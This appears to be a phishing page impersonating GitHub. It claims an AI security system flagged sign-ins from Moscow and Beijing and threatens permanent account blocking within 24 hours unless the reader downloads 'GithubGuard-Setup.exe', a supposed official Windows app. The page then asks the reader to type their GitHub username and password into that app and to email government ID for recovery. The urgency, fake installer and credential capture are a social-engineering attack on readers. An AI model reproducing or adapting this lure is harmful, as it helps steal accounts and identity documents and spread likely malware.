Suspicious Activity & Account Protection

Action required — your account may be blocked

Our AI security system has detected suspicious login and sign-in activity on your account. If no action is taken, your account will be automatically blocked to protect your organization and linked services.

What happened

Github continuously monitors account activity using an AI-powered security engine. Recently, several login attempts and sign-in events associated with your account were identified as potentially unauthorized. These events did not match your normal usage patterns in terms of location, device, or timing.

As a precautionary measure — and to comply with Github's organization security policy (similar to how enterprise platforms like Microsoft protect developer accounts) — accounts flagged as compromised are scheduled for automatic blocking until identity can be verified.

Note: This process is automatic and is not a punishment. It is a protective measure to prevent unauthorized parties from accessing your account or your organization's data.

Why your account was flagged

The Github AI security system flags accounts when one or more of the following anomalies are detected:

Anomalies detected by our system

Sign-in from an unrecognized location Suspicious

Multiple failed authentication attempts High Risk

Sign-in at an unusual time outside your normal pattern Suspicious

IP address associated with a proxy or VPN service Flagged

Flagged activity on your account

The following sessions were identified as suspicious and are the reason your account has been placed under a security hold. You can review and manage active sessions after verifying your identity through Github Guard.

Recent suspicious sessions

IP Address	Location	Event	Time	Status
195.91.204.xx	Moscow, Russia	Sign-in attempt	~2 hours ago	Suspicious
103.45.67.xx	Beijing, China	Password reset request	~5 hours ago	Suspicious
91.108.4.xx	Frankfurt, Germany	New device login	~11 hours ago	Unusual
—	Your location	Current session	Now	Verified

Important: The IP addresses shown above are partially masked for privacy. Full details, including device fingerprints and session tokens, are available inside Github Guard after you complete identity verification.

What you need to do

To prevent your account from being blocked and to secure it against the detected threats, you must verify your identity using Github Guard — the official Github desktop security application for Windows.

You must act within 24 hours

If you do not complete identity verification before the deadline, your account will be automatically and permanently blocked. Blocked accounts cannot be recovered and organization access will be permanently revoked.

Download Github Guard

Github Guard is the official Github desktop application for Windows. It lets you verify your identity, review and revoke suspicious sessions, set up two-factor authentication, and monitor your account security in real time — all from your Windows taskbar.

Github Guard

Official account security app by Github · Early Access

Windows

Windows 10 or later ~150 MB Free for all Github accounts

Verify your identity and prove account ownership
Review all active sessions and revoke unauthorized ones
Enable two-factor authentication (2FA) for future logins
Register your device as a trusted endpoint
Receive real-time alerts for future suspicious activity

Download Github Guard for Windows GithubGuard-Setup.exe · ~150 MB

After installing Github Guard

Once you have downloaded and installed Github Guard, follow these steps to secure your account:

Open Github Guard Launch the application from your Start menu or desktop shortcut after installation completes.
Sign in with your Github account Enter your Github username and password. The app will verify this is your trusted device.
Complete the identity check Follow the on-screen instructions to confirm your identity. This registers your current device as trusted and lifts the security hold on your account.
Review flagged sessions Open the Sessions tab to see all active logins. Click Revoke on any session you do not recognize.
Enable two-factor authentication We strongly recommend enabling 2FA from the Security tab to prevent this from happening again.

Once you complete the identity check in Github Guard, your account security hold is lifted immediately and you regain full access to all services and your organization.

If your account is already blocked

If the 24-hour window has passed and your account has already been blocked, recovery is not guaranteed. However, you can still contact Github Security Support to request a manual review.

Warning: Blocked accounts that were part of an organization may have had their organization membership permanently revoked as part of the security response. Manual recovery does not guarantee restoration of organization access.

To request a manual review, email us at security@Github.com with the following:

Your Github username
The email address associated with your account
A brief description of your recent activity
Proof of identity (government-issued ID may be required)

Contact security support

If you have questions about this security alert or need help with Github Guard, our security team is available to assist.

Security email security@Github.com

Help center Github.com/help

Support response time Usually within 24 hours

Last updated: April 2026 · Security Help Home · Help Center